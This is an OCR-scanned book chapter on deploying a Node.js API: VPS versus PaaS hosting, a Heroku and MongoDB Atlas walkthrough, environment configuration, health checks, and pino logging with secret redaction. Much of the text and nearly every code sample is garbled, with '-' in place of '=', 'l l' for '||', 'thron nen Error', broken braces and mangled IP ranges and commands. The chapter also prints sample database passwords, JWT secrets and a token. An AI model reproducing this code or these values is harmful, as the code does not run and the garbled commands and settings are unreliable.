CHAPTER-6
A Complete Server: Deployment
It doesn’t matter how impressive our server is if nobody else can use it. We need to ship our work for it to matter. In this chapter we’ll cover different ways to get our API live and different things we’ll want to keep in mind for production apps.
Running our app on a remote server can sometimes be tricky. Remote servers are often a very different environment than our development laptops. We’ll use some configuration management methods to make it easy for our app to both run locally on our own machine and in the cloud (i.e. someone else’s datacenter).
Once our app is deployed, we’ll need to be able to monitor it and make sure that it’s behaving the way we expect. For this we want things like health checks, logging, and metrics visualization.
For fun we can also test the performance of our API with tooling designed to stress-test our app such as ab (Apache Bench) or siege.
What You Will Learn
Deployment is a huge topic that warrants a book of it’s own. In this chapter we are going to discuss:
- Using a VPS (Virtual Private Server) and the various deployment considerations there
- Using a PaaS (Platform as a Service) and show a step-by-step example of how to deploy our Node app to Heroku, including a Mongo database.
- Deploying to Severless Hosts like AWS Lambda and the considerations there
- Features you often need to support for a production app such as secrets managment, logging, and health checks – and we’ll give suggestions for tooling there.
- and lastly, security considerations both within your server and some of its interaction with JavaScript web apps.
By the end of this chapter, you’ll a strong orientation for the various pieces required to deploy a production app. Let’s dive in.
Deployment Options
Today, there’s no shortage of options for us to deploy our API. Ultimately, there’s a tradeoff between how much of the underlying platform we get to control (and therefore have to manage) and how much of that we want handled automatically.
Using a VPS (Virtual Private Server)
On one end of spectrum we’d set up our own VPS (virtual private server) on a platform like DigitalOcean” (or Chunkhost”, Amazon EC2″, Google GCE8‘, Vultr“, etc…). Running our app on a server like this is, in many ways, the closest to running it on our own computer. The only difference is that we’d need to use a tool like SSH to log in and then install everything necessary to get our app ready.
This approach requires us be familiar with a decent amount of system administration, but in return, we gain a lot of control over the operating system and environment our app runs on.
In theory, it’s simple to get our app running: sign up for a VPS, choose an operating system, install node, upload our app’s code, run npm install and npm start, and we’re done. In practice, there’s a lot more we’d need to consider. This approach enters the realm of system administration and DevOps — entire disciplines on their own.
Here, I'm going to share many of the high-level considerations you need to make if you're deciding to run your app on a VPS. Because there is so much to consider, I'll be giving you some guidelines and links to reference to learn more (rather than a detailed code tutorial on each).
Security & System Administration
Unlike our personal computers, a VPS is publicly accessible. We would be responsible for the security of our instance. There’s a lot that we’d have to consider: security updates, user logins, permissions, and firewall rules to name a few.
We also need to ensure that our app starts up with the system and stays running. systemd” is the standard approach to handle this on linux systems. However, some people like using tools like [ pm2 ] ( https : //pm2 . io/doc/en /runtime/overview/ ) for this.
We’d also need to set up MongoDB on our server instance. So far, we’ve been using the MongoDB database that we’ve been running locally.
HTTPS
The next thing we’d have to take care of is HTTPS. Because our app relies on authentication, it needs to use HTTPS when running in production so that the traffic is encrypted. If we do not make sure the traffic is encrypted, our authentication tokens will be sent in plain-text over the public internet. Any user’s authentication token could be copied and used by a bad actor.
To use HTTPS for our server we’d need to make sure that our app can provision certificates and run on ports 80 and 443. Provisioning certificates isn’t as painful as it used to be thanks to Let’s Encrypt“ and modules like [green lock – express] ( https : //www . npmjs . com/ package/green lock – express ) . How- ever, to use ports 80 and 443 our app would need to be run with elevated privileges which comes with additional security and system administration considerations.
Alternatively, we could choose to only handle unencrypted traffic in our Node.js app and use a reverse proxy (Nginx“ or HAProxy’6) for TLS termination.
Scaling
There’s another issue with using HTTPS directly in our app. Even if we change our app to run an HTTPS server and run it on privileged ports, by default we could only run a single node process on the instance. Node.js is single-threaded; each process can only utilize a single CPU core. If we wanted to scale our app beyond a single CPU we’d need to change our app to use the [ cluster] ( https : //nodejs . org /api /cluster . html^cluster_cluster ) module. This would enable us to have a single process bind to ports 80 and 443 and still have multiple processes to handle incoming requests.
If we rely on a reverse proxy, we don’t have this issue. Only the proxy will listen to ports 80 and 443, and we are free to run as many copies of our Node.js app on other ports as we’d like. This allows us to scale vertically by running a process for each CPU on our VPS. To handle more traffic, we simply increase the number of cores and amount of memory of our VPS.
We could also scale horizontally, by running multiple instances in parallel. We’d either use DNS to distribute traffic between them (e.g. round-robin DNS), or we would use an externally managed load balancer (e.g. DigitalOcean Load Balancer87, Google Cloud Load Balancing8‘, AWS Elastic Load Balancing89, etc…).
Scaling horizontally has an additional benefit. If we have fewer than two instances running in parallel, we’ll have downtime whenever we need to perform server maintenance that requires system restarts. By having two or more instances, we can route traffic away from any instance while it is undergoing maintenance.
Multiple Apps
If we wanted to run a different app on the same VPS we’d run into an issue with ports. All traffic going to our instance would be handled by the app listening to ports 80 and 443. If we were using Node.js to manage HTTPS, and we created a second app, it wouldn’t be able to also listen to those ports. We would need to change our approach.
To handle situations like this we’d need a reverse proxy to sit in front of our apps. The proxy would listen to ports 80 and 443, handle HTTPS certificates, and would forward traffic (unencrypted) to the corresponding app. As mentioned above, we’d likely use Nginx90 or HAProxy9‘.
Monitoring
Now that our apps are running in production, we’ll want to be able to monitor them. This means that we’ll need to be able to access log files, and watch resource consumption (CPU, RAM, network IO, etc…).
The simplest way to do this would be to use SSH to log into an instance and use Unix tools like tail and grep to watch log files and htop or iotop to monitor processes.
If we were interested in better searching or analysis of our log files we could set up E1asticsearch’2 to store and our log events, Kibana9’ for searching and visualization, and Filebeat9‘ to move the logs from our VPS instances to Elasticsearch.
Deploying Updates
After our app is deployed and running in production, that’s not the end of the story. We’ll want to be able to add features and fix issues.
After we push a new feature or fix, we could simply SSH into the instance and do a simple giIpull 88 npm install and then restart our app. This gets more complicated as we increase the number of instances, processes, and apps that we’re running.
In the event of a faulty update where a code change breaks our app, it’s helpful to quickly roll back to a previous version. If our app’s code is tracked in git, this can be handled by pushing a “revert” commit and treating it like a new update.
Within the Node.js ecosystem, tools like PM2” and shipit” allow us automate a lot of this and can handle rollbacks. Outside of the Node.js ecosystem, there are more general-purpose DevOps tools like Ansible” that, if used properly, can do all of this and more.
Zero-Downtime Deploys
When deploying updates it’s important to think about downtime. To perform zero-downtime deploys, we need to make sure that (1) we always have a process running, and (2) traffic is not routed to a process that can’t handle requests.
If we were to run only a single process, we couldn’t have a zero-downtime deploy. After the update is transferred to our instance, we would need to restart our Node.js app. While it is restarting, it will not be able to accept requests. If we aren’t receiving much traffic, this may not be a big deal. If it’s not likely that a request will come in during the short window our app is restarting, we may not care.
On the other hand, if we do have a very popular app, and we don’t want our users to get timeouts, we’ll need to make sure that we always have a process available to receive traffic. This means that we need to run more than one process, restart processes one at a time, and never serve traffic to a process that is restarting. This is a tricky bit of orchestration, but it can be achieved using the tools above.
VPS Summary
There can be a lot to consider when deploying a Node.js app to a VPS. If we have a low traffic app that doesn’t need 1009a uptime, it can be a straightforward way to get it up and in front of users. Unfortunately, for anyone uninterested in system administration or DevOps, this approach is likely to be too much work when it’s necessary to monitor, scale, or use continuous delivery.
On the bright side, many companies are good at providing the services we’d be looking for when hosting a production app. They’ve rolled all these features up into their own deployment platforms, and these can be a great choice if we’re not interested in building them out ourselves.
If you're looking for something in between a VPS and a PaaS, Dokku" or CapRover” will allow you to run your own simplified PaaS on a VPS (or other hardware).
Using a PaaS (Platform as a Service)
Compared to a VPS, running our app on a PaaS like Heroku’00 or App Engine’0l is more restricting. The operating system is no longer under our control and there are constraints on what our app can do. These constraints vary, but there are some common ones like not being able to write to the file system or being able to perform long-running tasks.
On the other hand, these platforms are designed to be very easy to deploy to, and to take care of a lot of the pain-points we’d have when managing deployments with a VPS. Dealing with a few constraints, is often a small price to pay for the added benefits. For our purposes using a PaaS will be the lowest-hassle way get an app running in production.
Compared to a VPS:
- We don’t need to worry about system administration or security.
- Scaling is handled automatically when necessary.
- It’s easy to run as many different apps as we’d like.
- Monitoring is built in.
- Deploying zero-downtime deploys is easy.
As an example, we're going to deploy our app to Heroku. Before we can do that we first need to sign up for an accountl'°, download the Heroku Command Line Interface (CLI), and log in'0'.
Configure the Database
Next we’ll prepare our app so that it can run on Heroku’s platform. We don’t control the operating system, so we can’t install a database alongside our app. Instead we’ll use a MongoDB database that’s hosted separately from our app.
Luckily, we can quickly set one up for free using MongoDB Atlasl0‘. Heroku is hosted on AWS in the us -east -1 (N . Virginia) region, so we’ll choose that option for the lowest latency:
MongoDB Atlas Configuration
Next, we have to create a database user. This will be the user that our app connects to the database as. We’ll use the username fs – node and choose a password. This user needs read and write permissions:
Create a MongoDB User
openss I has a convenient command line tool to generate random bytes for use in passwords. For example, if we want 16 random bytes hex encoded, we'd run: openss1 rand - hex 28. This would give us output like: 27c2288688 I 386b2378899c4 19385a23981 27dd3.
Before we can connect to the database with this username and password, we need to configure the database to allow connections. By default, MongoDB Atlas will not accept any connections. We need to provide the IP addresses that are acceptable. For now, we’ll use 8. 8. 8. 8/8 to make our database accessible from anywhere.
MongoDB Atlas IP Configuration
Make our database accessible from anywhere.
To increase the security of our database, we should restrict access to a limited number of IP addresses. This is difficult on Heroku. By default, our app's IP will constantly change. It's possible to limit access to the range of IPs that Heroku will use, but this is a very large range (entire AWS regions). To limit our app to a small number of IP addresses we would need to use a Network Add-On"" or Private Spaces”‘. Once we do that we'd be able to restrict access to our database from the limited number of IP addresses our app will connect from. For more information see this Heroku support issuel”.
Now that our database has a user account and is accessible, we can make sure that our app can connect to it. For this we’ll need to get the connection string that our app will use:
MongoDB Atlas Connection String
The MongoDB connection string is in the format:
mongodb+srv://$/username}:8{passwordjA${hostj/$/dbName}?8{connection0ptionsj
Atlas will provide the connection string with all values filled in except for our password that we just created. If there are special characters in the password, make sure that they are URL encoded’08.
After we insert the password, we can use this connection string when running locally to make sure everything is working:
1 MONGO_URI=mongodb+srv://fs-node:27c2200680f306b2378899c119385a2398127dd3Scluster0-qj\
2 tmq.mongodb.net/test?retryWrites=true \
3 npm start
This works because in our db . js file we allow the connection string to be overridden by the floNGO_- UR I environment variable:
mongoose.connect(
process.env.MONOO_URI l l 'mongodb://localhost:27017/printshop' ,
{ useNewUrlParser: true, useCreateIndex: true }
Assuming everything has been set up correctly, our app will start up without issue and we’ll be able to request the (empty) product list without seeing an error.
If our connection string is formatted incorrectly or we haven't properly set network access we might see an authentication error like NongoError: bad auth Authentication failed or Error: querysrv ENOTFOUND _mongodb . _tcp If so, it's much easier to catch and fix that now then seeing these issues on the remote Heroku server.
With our database configured and ready, it’s now time to deploy our app!
Deploying
The first thing we need to do deploy our app on Heroku is to use the Heroku CLI to create a new app their platform. To do this we use the heroku create command. We’ll call our project fullstack-node-book:
0 heroku create fullstack-node-book
Creating 0 fullstack-node-book. done
https://fullstack-node-book.herokuapp.com/ | https://git.heroku.com/fullstack-node-book.git
In addition to creating a new app on their platform, it also added a new remote in our g it config.
We can see that if we cat . git/config.
0 cat .git/config
[core]
repositoryformatversion = 0
filemode - true
bare = false
logallrefupdates - true
ignorecase = true
precomposeunicode - true
[remote ”heroku”]
url https://git.heroku.com/fullstack-node-book.git
fetch - +refs/heads/*:refs/remotes/heroku/*
Heroku uses git for deployment. This means that any app that we want to deploy must be able to pushed to a git repository. If you don't have git configured yet, consult the official First-Time Git Setup Guide'0’, and make sure that your project is tracked with git.
The next step is to make sure that when our app is running on Heroku’s platform it has the correct environment variables for our database and secrets. For the database, We want to use the MongoDB Atlas connection string that we just tested. However, we want to generate new, secure secrets for the admin password and JWT secret. We can do this in one shot using the heroku config command:
heroku config:set \
MONGO_URI-mongodb+srv://fs-node:27c2200680f306b2378899c119385a2398427dd3Scluster0-\
qjtmq.mongodb.net/test?retryWrites=true \
JWT_SECRET-$(openssl rand -base64 32) \
ADMIN_PASSWORD-$(openssl rand -base64 32)
Setting MONOO_URI, JWT_SECRET, ADMIN_PASSWORD and restarting 0 fullstack-node-book..\
done, v1
ADMIN_PASSWORD: VlVxoYlIavixTUyVWPcjv/cD6Ho+eTZ+Tt4KTYFqvIM-
JWT_SECRET: +UfpfaFFAssCO9vbc81ywrPwDbKy3/DEe3UQLmliskc=
MONOO_URI : mongodb+srv://fs-node:27c2200680f306b23T8899c119385a239812Tdd3Sclust\ er0-qjtmq.mongodb.net/test?retryWrites=true
We use openss I rand -base64 32 to generate random strings for use as our production admin password and JWT secret. We need to use at least 32 bytes for our JWT secret to protect against brute forcing”°. The Heroku CLI will output them for us once they’re set, and if we ever need them again we can use the heroku config command to have them listed. We’ll need the ADMIN_PASSWORD to log in as the admin user.
With the environment variables in place, our app can now start up with all the information it needs. The only thing left is to send our app’s code over to Heroku. We can do this with a simple push:
0 git push heroku master
Counting objects: 24, done.
Delta compression using up to 8 threads.
Compressing objects: 100% (22/22), done.
Writing objects: 100% (24/24), 74.60 KiB | 8.29 MiB/s, done.
Total 24 (delta 1), reused 0 (delta 0)
remote: Compressing source files.done.
remote: Building source:
remote:
remote: -----> Node.js app detected
remote:
remote: -----› Creating runtime environment
remote:
remote: NPP_C0NF IG_L0GLEVEL=error
remote: N0DE_ENV'production
remote: N0DE_P0DULES_CACHE=True
remote: N0DE_VERB0SE' false
remote:
remote: -----› Installing binaries
remote: engines.node (package.json): unspecified
remote: engines.npm (package.json): unspecified (use default)
remote:
remote: Resolving node version 10.x.. .
remote: Downloading and installing node 10.16.0...
remote : Using default npm version: 6.9.0
remote:
remote: -----› Installing dependencies
remote: Installing node modules (package.json)
remote:
remote: › deasyncS0.1.15 install /tmp/build_Ta8dbae3929e0d5986b4f38e08d66f19/\ node_modules/deasync
remote: › node ./build.js
remote:
remote: linux-x64-node-10 exists; testing
remote: Binary is fine; exiting
remote:
remote: › bcrypt43.0.6 install /tmp/build_7a8dbae3929e0d5986b4f38e08d66f19/node_modules/bcrypt
remote: › node-pre-gyp install --fallback-to-build
remote:
remote: bcrypt] Success: odules/bcrypt/lib/binding/bcrypt_lib.node” is installed via remote
remote:
remote: › mongodb-memory
serverS5.4.5postinstall/tmp/build_7a8dbae3929e0d59\86b4f38e08d66fl9/node_modules/mongodb-memory-server
remote: › node ./postinstall.js
remote:
remote: mongodb-memory-server: checking MongoDB binaries cache. . .
remote: mongodb-memory-server: binary path is /tmp/build_Ta8dbae3929e0d5986b4f38e08d\ 66f19/node_modules/.cache/mongodb-memory-server/mongodb-binaries/4.0.3/mongod
remote: added 460 packages from 32T contributors and audited 1652 packages in\ 19. 956s
remote: found 0 vulnerabilities
remote:
remote:
remote: ---› Build
remote:
remote: ---› Caching build
remote: node_modules
remote:
remote: ---› Pruning devDependencies
remote: removed 248 packages and audited 396 packages in 3.982s
remote: found 0 vulnerabilities
remote:
remote:
remote: ---› Build succeeded!
remote: ---› Discovering process types
remote: Procfile declares types -> (none)
remote: Default types for buildpack -> web
remote:
remote: ---› Compressing. . .
remote: Done: 44. 3M
remote: ---› Launching ...
remote: Released v2
remote: https://fullstack-node-book herokuapp com/ deployed to Heroku
remote:
remote: Verifying deploy.. . done.
To https://git.heroku.com/fullstack-node-book.git
* [ new branch ] master -› master
Our app is now running at https: // and we can verify that it’s working as expected with curl:
curl https://fullstack-node-book.herokuapp.com/products
Of course we haven’t added any products to the production database yet so we expect the results to be empty. However, we can also log in using our new admin password:
1 curl -sX POST \
2 -H 'content-type: application/json' \
3 -d '("username" "admin", "password" "QoMsSRVIaTlR3StXSHg9m/UMhaZmTS4+IJeen\
4 4lFKK0=”}' \
5 https://fullstack-node-book.herokuapp.com/ \
6 jq-r .token \
7 › admin.jwt
And create a product:
1 curl -X POST \
2 -H 'content-type: application/json' \
3 -H "authorization: Bearer $(cat admin.jwt)" \
4 -d "$(cat products.json | jq '. [1] ')" \
5 https://fullstack-node-book.herokuapp.com/
And now we’ll be able to see it in the list:
curl -s https://fullstack-node-book.herokuapp.com/products l jq
"tags" : [
"marble",
"texture",
"red" ,
"black",
"blood",
"closeup",
"detail",
"macro"
"_id" : "cjv32mizi0000c9gl8lxa75sd",
Deploying to Severless Hosts
Since the release of AWS Lambdal” in April 2015, serverless deployments have steadily risen in popularity. Today there are many choices if we want to go this route including Google Cloud Functions“2, Zeit Now“”, Netlify Functions“‘, Cloudflare Workers“’, and Azure Functions“6 to name a few.
When using serverless deploys we cede even more management responsibility to the platform than when using a PaaS. With a PaaS we’re responsible for creating a full functioning app. With serverless, we can ignore a lot of the app and just create individual endpoints, and the platform handles routing.
Similar to when moving from a VPS to a PaaS, there are additional rules that our app has to follow when moving to serverless. The most notable is that we’re no longer creating a stand-alone app that can run on any system. Instead, we create a collection of functions that are capable of running within the platform’s service. For this reason it can be easier to build directly for serverless deploys rather than rearchitecting an existing app to fit a particular platform.
While we won’t cover that here, it’s worth noting that serverless deploys provide interesting tradeoffs and can be a great choice for particular use-cases.
Deployment Considerations
Our app is capable of running in production now, but there are a number of changes that will make our life easier.
Configuration Management
First, we have a multiple files that access process . env directly. This means that we don’t have a central place to see all of the environment variables that control the configuration of our app. It’s much better to create a single con Iig . js module that other files can require.
Additionally, when running locally, it’s inconvenient to set environment variables each time we want to run our app with different environment settings. A much better approach is to use dotenv”7.
dotenv allows us to set environment variables from a . env file, instead of setting them on the command line. For example, if we creating a file called . env in the root of our project with the following contents:
1 ADMIN_PASSWORD=leeXq9AbF/snt0LSRzeEdVsx/D/2l4RbiS3ZZG8lVls=
2 JWT_SECRET=pqE9mdrIBpQAwUqcrY2ApwOdSA0RaJhcFq8nO0tPNHI=
3 MONGO_URI=mongodb+srv://fs-node:2Tc2200680f306b23T8899c119385a239812Tdd3Scluster0-qj\
4 tmq.mongodb.net/test?retryWrites=true
when we run our app, all of those variables will be set for us.
Using this in conjunction with a config . js file, we’d get something like this:
require( 'dotenv').config()
module.exports = {
adminPassword : process.env.ADMIN_PASSWORD ' iamthewalrus',
jwtsecret: process.env.JWT_SECRET I I 'mark it zero',
mongo: (
connectionstring : process.env.MONOO_URI 'mongodb://localhost:270{7/printshop'
Just like before, we can still have defaults for development. If the environment variables aren’t set because we don’t have a . env file, our app will use the local development values.
It’s important to remember that . env files should never be checked into version control. They are simply a convenience to avoid setting variables in our terminal. However, it is useful to check a . env . example file into git. This file will have all of the variables with their values removed and acts as a catalog of configuration options. This makes it easy see which variables are available and team members can use it as a starting place for their own . env files. Here’s our . env . examp le file: <<06-deployment/02/.env.examplel“
Health Checks
The sad truth of running apps in production is that if something can go wrong, it will. It’s important to have a way to quickly check if our app is up and be notified if our app goes down.
The most basic health check would be a publicly accessible endpoint that returns a 200 HTTP status code if everything is ok. If that endpoint responds with an error, we’ll know our app needs attention.
It’s easy enough to create a new /health route that immediately returns a 200 HTTP status, and that will get us most of the way there. If our app is up and running, we’ll get the appropriate response when we hit that endpoint.
Here’s an example of a route handler function that can serve as a basic health check route:
function health(req, res) { res.json({ status: "OK" });
However, we should also think a bit more about what “up and running” means. Depending on how our app is built, it’s possible that our basic health check will return OK responses while user requests are dropped. For example, this can happen if we lose the connection to our database or another backing service. For our health check to be comprehensive, we need to test the connections to any backing services that we rely on.
We can change our basic health check handler to only successfully respond after testing our database. It might be tempting to only test reads, but to be absolutely sure that our database is working correctly, we should test both reads and writes. This way we’ll be alerted if our database runs out of storage or develops other write-related issues.
First we add a new checkHealth( ) method to our db . js module:
module.exports.checkHealth - async function () (
const time - Date.now()
const ( db } - mongoose.connection
const collection - db collection('healthcheck')
const query - { _id: 'heartbeat' }
const value = { time }
await collection.update(query, value, ( upsert: true })
const found - await collection.findOne({ time: { $gte: time } })
if (!found) thron nen Error('DB Healthcheck Failed')
return !!found
This method will either resolve as true if the database is able to read and write, or it will throw an error if it can’t. Adding it to our route handler is simple:
async function checkHealth (req, res, next) {
await db.checkHealth()
res.json(( status: 'OK' })
If db . checkHealth( ) throws an error, our error handling middleware will deal with it; otherwise, we respond with an OK status. We can test the behavior by stopping MongoDB after our app is running and hitting the /hea lth route.
Once we have this new endpoint deployed we can use a service to regularly check our uptime and alert us (via SMS, email, Slack, etc…) if there’s a problem. There are many services that do this (StatusCake1‘9, Pingdom’°0, Uptime’°1, Oh Dear!”2, and more), each with their own level of service and pricing.
Logging
Our logs can tell us how our app is being used, by whom, and how well it is serving our users. Not only that, but we can use our logs as the foundation for charts and visualizations. This opens the door to seeing how our app is performing over longer time periods. This is critical to anticipating problems before they happen.
Currently, our app only logs errors. While this is a good start, when running an app in production it’s critical to have more visibility than this. At a minimum, we should be logging each request along with the url requested, user agent, and response time.
However, even if we add additional information to our logs. Our logs will only be useful if they are
easily accessible and searchable. We can achieve this in many different ways. We can use services like Stackdriver Logging’2“, Papertrai1′2 Datadog’2’, Graylog 26 and Loggly 27 or we can run our own version with tools like Elasticsearch and Kibana”’.
If our app is deployed to Heroku, we'll be able to use the heroku logs command to fetch our logs. We can even use heroku logs - -tail to view logs in real-time as they happen. While this gives us the ability to debug problems in the moment, we're limited to the previous 1,500 lines. It's best to use a logging add-on“’ for more power.
Currently, our app is logging with plaintext. This is fine for humans working locally, but once we’re running in production, we’ll want our logs to have more than just a single message. We’ll want separate, machine-readable metadata fields like timestamp, hostname, and request identifiers. When recoding metrics like response time, we also need to be able to log numbers instead of text. To accomplish this, instead of writing logs as plaintext we’ll use JSON.
One of the best things we can do is make sure that all log messages related to a request can be linked together. This is indispensable when we need to figure out how a particular error happened. By adding a request ID to each log message, we can search for all messages with a particular ID to get a better picture of the chain of events that led to an issue.
To upgrade our app’s logging we’ll use pi no'”. pino is a performance-focused JSON logger. It has been designed to use minimal resources and is 5x faster than alternatives”l. Conveniently, we can use the express – pino – logger’ 2 module to plug it into our app as middleware:
const express - require('express')
const bodyParser - require('body-parser')
const pinoLogger - require('express-pino-logger' )
const cookieParser - require('cookie-parser')
const api - require( ' . /api ')
const auth - require(' ./auth')
const middleware = require(' . /middleware' )
const port - process.env.PORT | | 1337
const app - express()
app.use(pinoLogger())
app.use(middleware.cors)
app. use(bodyParser.json())
app. use(cookieParser())
app.get( '/health ', api.checkHealth)
Now when we run our app, each request will automatically be logged. To try it out. While our app is running we’ll use curI to log in and look at the output:
1 0 node server.js
2 Server listening on port 1337
3 {”level” :30,”time” :1562T6TT693T0,”pid”:41654,”hostname”:”Fullstack-Nodejs. lan”,”req”\
4 {”id” :1,”method”’ ”POST”, ”url”’ ”/login”, ”headers” :(”host” ”localhost:133T”,”user-age\
5 nt” : ”curl/T.51.0”,”accept” : ”*/*”, ”content-type” : ”application/json”,”content-length”: \
6 ”49”},”remoteAddress”’”’:1”,”remotePort”:5230T},”res”:{”statusCode”:200,”headers”:{”\
7 x-powered-by” :”Express”,”access-control-allow-origin” :"*”,”access-control-allow-meth\
8 ods”’”POST, GET, PUT, DELETE, OPTIONS, XMODIFY”,”access-control-allow-credentials”’”\
9 true”,”access-control-max-age” :”86400”,”access-control-allow-headers” :”X-Requested-W\
10 ith, X-HTTP-Method-Override, Content-Type, Accept”,”set-cookie”’”jwt=eyJhbGciOiJIUzI\
11 1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTYyNzY3NzY5LCJleHAiOjE1Nj\
12 UzNTk3Njl9.Yg3vnCYeZCGofrTswiXAMyrNsAEHxhQ5jgnwHV0b0tw; Path=/; Httponly”, ”content-t\
13 ype”:”application/json; charset=utf-8”,”content-length":”180”,”etag”’"W/\”b4-AdZOUjf\
i4 vwqgDehB+Slq44lRDCkk\””}},”responseTime”:2T,”msg”’”request completed”,”v”:1}
That’s a lot of information. This is great for production, but it’s not very readable when running locally. pino- pretty”’ is a module we can use to make our server output easier to read. After we install it globally using npm i – g pino- pretty, we can run node server . js and pipe it to pino- pretty. Now the output will be nicely formatted.
Using curl to log in again, we can see the difference:
Now, we can clearly see all the information that pino is logging. In fact, we can see that pi no logs all the request and response headers, which is super useful.
Unfortunately, the headers contain the authentication cookie we send to the client! The JWT token is right there in set -cookie in the response headers. Anyone with access to the logs would be able to impersonate the admin user. Depending on who has access to these logs, this could be a big security problem.
If our logs are only viewable by people who already have admin access, this isn’t a big deal. However, it can be very useful to share logs with other developers or even people outside our organization for debugging purposes. If we leave sensitive information like credentials in our logs, this will cause headaches or worse. It’s best to remove them entirely.
Luckily, removing sensitive information from our logs is easy with the pino – noir'” module. After we install it we can use it in conjunction with express – pino – logger.
Our logging configuration is getting more complicated than just a single line, so we’re going move our logging setup from server . j s to middIeware . js. Here’s how we can use pino- noir with express – pino – Iogger:
const pinoNoir - require('pino-noir')
const pinoLogger - require('express-pino-logger' )
const ( STATUS_CODES } = require('http')
module.exports = {
logger: logger(),
COPS,
not Found ,
handleError ,
handleValidationError
function logger () {
return pinoLogger((
serializers: pinoNoir([
'res.headers.set-cookie',
'req.headers.cookie' ,
'req.headers.authorization'
In server . js we can now change our app . use( ) to use our updated logger:
app.use(middleware.logger)
When we require middleware . js, middleware . logger will be a customized p i no logger that will mask the res . headers . set – cookie, req . headers . cookie, and req . headers . authorization proper- ties. In the future if we want to hide other information from our logs, we can simply add the paths here.
To verify that this worked let’s run our server, log in again, and look at the output. If we look below, we can see that set – cookie now shows as [ Redacted] — exactly what we want:
1 D node server.js | pino-pretty
2 Server listening on port 133T
3 [1562857312951] INFO (68228 on Fullstack-Nodejs.local): request completed
4 req: (
5 "id" : {,
6 "method" : "POST" ,
7 "ur l " : " / log i n " ,
8 "headers" : (
9 "host" : "Doc a l host : t337" ,
10 "user -agent" : "cur l /7. 5t . 0" ,
11 "accept" : " */* " ,
12 "content-type": "application/json",
13 "content-length": "49"
14 },
15 ” remoteAddress ” : " : : I ” ,
16 " remotePort ” : 55840
17 }
18 res: {
19 "statusCode": 200,
20 "headers" : (
24 "x-powered-by"’ "Express",
22 "access-control-allow-origin" : "*",
23 "access-control-allow-methods"’ "POST, GET, PUT, DELETE, OPTIONS, XMODIFY",
24 "access-control -allow-credentials": "true",
25 "access-control-max-age”’ "86400",
26 "access-control -allow-headers": ”X-Requested-With, X-HTTP-Method-Override, C\
27 on tend -Type , Accept" ,
28 "set-cookie" : " Redacted] ",
29 "content-type”’ "application/json; charset=utf-8",
30 "content-length": "{80",
31 "etag " "W/ \" b4— Z AZ I TgMoMZ0Y19qZVt w/m4GXBmA\" "
32 }
34 responseTime: 25
We can also send an authenticated request using JWT to verify that we don’t log tokens in the request headers:
Great, our automatic route logging is good to go. We can now use pi no to log any other information that we’re interested in, and as a bonus, we can use the req . id property to tie it to the route logs.
Currently, when a new user is created we don’t much information. Because the new email address and username are sent via POST body, they aren’t automatically logged. However, it might be nice to log new email addresses and usernames. We can do this easily:
async function createUser (req, res, next) {
const user = await Users.create(req.body)
const ( username, email } - user
req. log. info({ username, email }, ' user created' )
res.json({ username, email })
By adding a call to req . log . info( ) we’ll use pi no to output another log line that is correctly formatted and associated with that particular request. Let’s see what it looks like when we hit this endpoint with that logging in place:
1 Server listening on port 133T
2 [1562858941319] INFO (78868 on Fullstack-Nodejs. local): user created
3 req: (
4 "id" : {,
5 "method" : "POST",
6 "url": "/users",
7 "headers" : (
8 "content-type": "application/json",
9 "user-agent": "PostmanRuntime/T.13.0",
0 "accept" : "*/*",
ii "cache-control": "no-cache",
2 "postman-token": "9{{6ffde-bfa2-42e6-8c44-4f6a2922c0c0",
3 "host": "localhost:133T",
44 "cookie": "[Redacted]",
5 "accept-encoding": "gzip, deflate",
b "content-length": "{0{",
7 "connection": "keep-alive"
8 },
9 "remoteAddress": ” : :4”,
20 "remotePort": 57250
2i }
22 username: "fullstackdavid"
23 email: "davidAfullstack. io"
24 [1562858941325] INFO (78868 on Fullstack-Nodejs.local): request completed
25 req: {
26 "id"’ 1,
27 "method" : "POST",
28 "url”’ "/users",
29 "headers" : (
30 "content-type"’ "application/json",
31 "user -agent" "PostmanRunt i me/T . t3. 0" ,
32 "accept" : "*/*",
33 "cache-control”’ "no-cache",
34 "postman-token": "9{{6ffde-bfa2-42e6-8c44-4f6a2922c0c0",
35 "host"’ "localhost:133T",
36 "cookie": "[Redacted]",
3T "accept-encoding”’ "gzip, deflate",
38 "content-length": "{0{",
39 "connection”’ "keep-alive"
4B },
44 "remoteAddress"’ ”’ :1”,
42 "remotePort" : 57250
43 }
44 res: (
45 "statusCode" : 200,
46 "headers": (
47 "x-powered-by": "Express",
48 "access-control-allow-origin" : "*",
49 "access-control-allow-methods" : "POST, GET, PUT, DELETE, OPTIONS, XMODIFY",
50 "access-control-allow-credentials" : "true", 5t "access-control-max-age": "86400",
52 "access-control-allow-headers" : "X-Requested-With, X-HTTP-Method-Override, C\
53 content-Type, Accept",
54 "content-type": "application/json; charset:utf-8",
55 "content - length" : "59" ,
56 "etag " : "U/ \" 3b - p0L94hLX+OF/cZt J fv9brXScrt Y \" "
57 }
58 }
59 responseTime: 1T2
For this request, we get two lines of log output. The first is for our added log where we can see that the new user’s username is fullstackdavid, and the second one is the default p i no output for all requests. What’s great about this is that we can use req . id to link them. This is very useful for seeing all information related to a particular event. While this is only a small example, we can now know that when the fu11stackdavid account was created, it took 172 milliseconds.
In this example we’re running locally, so that only two log lines are related to the same request. However, in production we’ll be getting may requests at the same time, so we wouldn’t be able to assume that two adjacent log lines are from the same request — we need req . id to link them together.
Compression
Our API is currently set up to send uncompressed responses to clients. For larger responses, this will increase load times. Browsers and other clients support gzip compression to reduce the amount of data that our API needs to send.
For many sources of JSON data, it’s not uncommon to be able to reduce the transfer size by 80- 90P‹. This means that to transfer 130k of JSON data, the API would only need to transfer 14k of compressed data.
How we take advantage of compression will depend on how we choose to deploy our API. Most load balancers and reverse proxies will handle this automatically if we set the correct content -type response header. This means that if we use a platform like Heroku or Google App Engine, we generally don’t have to worry about compressing the data ourselves. If we’re using something like Nginx, there are modules like ngx_http_gzip_moduIe'” to take care of it.
If we’re allowing clients to connect directly to our API without using a platform or a reverse proxy like Nginx, we should use the compression middleware'”6 for express.
Caching and Optimization
Sometimes we’ll have endpoints that take a long time to return data or are accessed so frequently that we want to optimize them further. For example, we may want a route that returns the top selling products for each category. If we need to process a lot of sales data to come up with this report, and the data doesn’t need to be real-time, we won’t want to generate it for each request.
We have a few options for solving this problem, each with their own tradeoffs. In general, we’d like to minimize both client response times, report staleness, and wasted work.
